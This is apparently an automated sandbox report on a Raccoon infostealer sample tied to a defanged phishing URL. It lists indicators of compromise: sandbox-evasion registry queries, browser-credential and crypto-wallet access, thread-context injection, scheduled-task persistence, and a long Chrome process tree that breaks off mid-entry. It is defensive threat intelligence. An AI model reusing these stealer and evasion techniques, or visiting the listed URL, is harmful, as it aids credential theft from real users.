raccoon | hxxps://securemail[.]oasisonthemount[.]org/

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup___Pass___1234.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup___Pass___1234.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup___Pass___1234.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/3272-131-0x0000000000400000-0x0000000000554000-memory.dmp	autoit_exe
behavioral1/memory/3272-132-0x0000000000400000-0x0000000000554000-memory.dmp	autoit_exe
behavioral1/memory/3272-133-0x0000000000400000-0x0000000000554000-memory.dmp	autoit_exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3092 set thread context of 3676	3092	Setup___Pass___1234.exe	100
PID 3868 set thread context of 3272	3868	New__Setup.exe	113

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	New__Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	New__Setup.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
624	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\winmgmts:\root\cimv2	New__Setup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4016	chrome.exe
4016	chrome.exe
3764	chrome.exe
3764	chrome.exe
3240	chrome.exe
3240	chrome.exe
3280	chrome.exe
3280	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1496	chrome.exe
1496	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
2204	chrome.exe
2204	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
3180	chrome.exe
3180	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
3796	chrome.exe
3796	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
3672	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1732	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs

pid	Process
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	taskmgr.exe
Token: SeSystemProfilePrivilege	1732	taskmgr.exe
Token: SeCreateGlobalPrivilege	1732	taskmgr.exe
Token: SeRestorePrivilege	3880	7zG.exe
Token: 35	3880	7zG.exe
Token: SeSecurityPrivilege	3880	7zG.exe
Token: SeSecurityPrivilege	3880	7zG.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
3764	chrome.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe
1732	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3764 wrote to memory of 3792	3764	chrome.exe	42
PID 3764 wrote to memory of 3792	3764	chrome.exe	42
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4012	3764	chrome.exe	44
PID 3764 wrote to memory of 4016	3764	chrome.exe	43
PID 3764 wrote to memory of 4016	3764	chrome.exe	43
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45
PID 3764 wrote to memory of 4020	3764	chrome.exe	45

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://securemail.oasisonthemount.org/
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0x84,0xd8,0x7ff9e9664f50,0x7ff9e9664f60,0x7ff9e9664f70
  2⤵
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1712 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:2
  2⤵
  PID:4012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
  2⤵
  PID:4044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
  2⤵
  PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
  2⤵
  PID:3264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:8
  2⤵
  PID:3680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5768 /prefetch:8
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8
  2⤵
  PID:2156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:2572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5952 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:8
  2⤵
  PID:336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:8
  2⤵
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1
  2⤵
  PID:3152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:1832
- C:\Program Files\Google\Chrome\Application\chrome.exe
